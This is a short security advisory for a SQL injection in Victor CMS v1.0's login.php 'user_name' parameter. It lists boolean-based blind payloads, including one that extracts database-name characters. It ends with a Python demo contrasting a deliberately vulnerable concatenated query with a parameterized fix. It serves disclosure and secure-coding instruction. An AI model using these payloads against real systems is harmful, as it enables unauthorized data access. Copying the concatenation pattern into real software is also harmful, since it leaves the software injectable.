VictorCMS SQL.md

  • VULNERABLE: A SQL injection vulnerability exists in VictorCMS. An attacker can inject a query in "/CMSsite/includes/login.php" via the "user_name" parameter.
  • Product: Victor CMS v1.0
  • Impact: Allows an attacker to inject queries and to access and disclose all data on the system.
  • Payload Boolean true: test' or '1'='1
  • Payload Boolean false: test' or '1'='2
  • Payload exploit example: test' or (ascii(substr((select(database())),1,1))<127)--+-
  • Proof of concept (POC):

image

  • The response status of the returned packet differs depending on whether the user name is correct or not.
  • Payload Boolean true: user_name=test'+or+'1'='1

image

  • Payload Boolean false: user_name=test'+or+'1'='2

image

  • Exploit:

image
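
The true/false response difference described above comes from user input being parsed as part of the SQL text. The following added example (not code from VictorCMS or from this advisory) models that with Python's `sqlite3` and shows that binding the value as a parameter removes the difference; the `users` table, its columns and the sample row are assumptions constructed for the demonstration.

```python
import sqlite3

# Payloads quoted from the advisory above.
TRUE_PROBE = "test' or '1'='1"
FALSE_PROBE = "test' or '1'='2"


def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return db


def lookup_concatenated(db, user_name):
    """Vulnerable pattern: the input becomes part of the SQL text."""
    sql = "SELECT user_name FROM users WHERE user_name = '" + user_name + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_name):
    """Hardened pattern: the input is bound as data, never parsed as SQL."""
    sql = "SELECT user_name FROM users WHERE user_name = ?"
    return db.execute(sql, (user_name,)).fetchall()


def responses_differ(lookup, db):
    """True when the two probes give different outcomes (the boolean oracle)."""
    return bool(lookup(db, TRUE_PROBE)) != bool(lookup(db, FALSE_PROBE))


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, "oracle present:", responses_differ(fn, db))
```

The same pair of requests can serve as a regression check after a fix: once the parameter is bound rather than concatenated, both probes must produce the same response.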